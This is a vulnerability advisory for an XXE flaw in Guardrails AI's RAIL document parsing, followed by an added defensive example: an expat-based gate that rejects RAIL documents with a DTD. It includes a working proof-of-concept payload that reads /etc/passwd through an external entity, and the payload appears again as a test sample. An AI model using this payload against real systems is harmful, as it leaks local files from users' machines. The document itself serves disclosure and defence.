XXE in Guardrails AI when consuming RAIL documents
Package: guardrails-ai (PyPI)
Affected versions: (,0.5.0), i.e. every release before 0.5.0
RAIL documents are an XML-based format defined by Guardrails AI to describe the expected structure of an LLM output and the checks to enforce on it. Guard.from_rail_string parses such a document with an XML parser that resolves external entities, so any Guardrails user who loads RAIL documents from an external (untrusted) source is exposed to XML external entity injection (XXE): a SYSTEM entity declared in the document's DTD is expanded into the prompt, which leaks the contents of local files such as /etc/passwd into the request sent to the model and into the returned output.
import os

import guardrails as gd
import litellm

# litellm reads the Anthropic key from the environment; replace the placeholder.
os.environ["ANTHROPIC_API_KEY"] = "put_here_your_secret_api_key"

# Assume this RAIL document comes from an attacker. The DOCTYPE declares an
# external entity that points at a local file; the reference &xxe; inside
# <prompt> is expanded when the RAIL XML is parsed, before any LLM call.
rail_str = """<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<rail version="0.1">
<output type="string"></output>
<prompt>
just write back what appears down here:
&xxe;
</prompt>
</rail>
"""

# Call the vulnerable API: parsing the RAIL string resolves the entity.
guard = gd.Guard.from_rail_string(rail_str)
llm_output_unfiltered, validated_output, *rest = guard(
    llm_api=litellm.completion,
    model="claude-3-opus-20240229",
)

# The prompt handed to the model, and therefore validated_output, contains
# the contents of /etc/passwd.
print(validated_output)
No mitigations are supplied for this issue. Consumers that load RAIL documents from external sources should move to a release outside the affected range (0.5.0 or later) and, until then, refuse any RAIL document that declares a DTD.
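The following is an added example, not code from the advisory or from the Guardrails project: a pre-parse gate that a consumer can put in front of Guard.from_rail_string while still on an affected release. It uses the standard-library expat parser to abort at the first DOCTYPE declaration, so an attacker-controlled entity is never resolved. The sample documents are constructed here (the malicious one mirrors the proof of concept above), and the `loader` callable is a placeholder for `gd.Guard.from_rail_string`, which is assumed and not imported so the file runs without Guardrails installed.

```python
"""Reject RAIL documents that carry a DTD before handing them to Guardrails."""
import xml.parsers.expat


class UnsafeRailDocument(ValueError):
    """The RAIL document declares a DTD, so it may carry an XXE payload."""


class _DoctypeSeen(Exception):
    """Internal signal used to stop the parse at the DOCTYPE declaration."""


def has_doctype(rail_str: str) -> bool:
    """Return True if the document declares a DOCTYPE (and hence may define entities).

    expat is non-validating and does not fetch external entities by itself; on
    top of that we abort as soon as the DOCTYPE starts, so entity declarations
    and the &xxe; reference in the body are never even looked at.  A malformed
    document raises xml.parsers.expat.ExpatError.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise _DoctypeSeen()  # exceptions raised in handlers propagate out of Parse()

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(rail_str, True)
    except _DoctypeSeen:
        return True
    return False


def check_rail_document(rail_str: str) -> None:
    """Raise UnsafeRailDocument unless rail_str is well-formed XML with no DTD."""
    try:
        found = has_doctype(rail_str)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeRailDocument(f"not well-formed XML: {exc}") from exc
    if found:
        raise UnsafeRailDocument("RAIL document declares a DTD; refusing to load it")


def load_untrusted_rail(rail_str: str, loader):
    """Gate an untrusted RAIL string, then hand it to `loader`.

    In a real deployment `loader` is guardrails.Guard.from_rail_string (an
    assumption of this example; Guardrails is deliberately not imported here).
    """
    check_rail_document(rail_str)
    return loader(rail_str)


# Constructed sample input mirroring the advisory's proof of concept.
MALICIOUS_RAIL = """<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<rail version="0.1">
<output type="string"></output>
<prompt>
just write back what appears down here:
&xxe;
</prompt>
</rail>
"""

# Constructed benign RAIL document: same shape, no DTD.
BENIGN_RAIL = """<?xml version="1.0"?>
<rail version="0.1">
<output type="string"></output>
<prompt>
Summarise the following text in one sentence.
</prompt>
</rail>
"""


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_RAIL), ("benign", BENIGN_RAIL)):
        try:
            load_untrusted_rail(doc, lambda s: "guard built")
            print(f"{label}: accepted")
        except UnsafeRailDocument as exc:
            print(f"{label}: rejected ({exc})")
```

The gate rejects every document with a DOCTYPE rather than trying to tell safe internal entities from external ones, because legitimate RAIL documents have no use for a DTD. It protects only the code path that goes through your wrapper; the underlying fix is for the library to parse with external entity resolution disabled, which is what moving to a fixed release gives you.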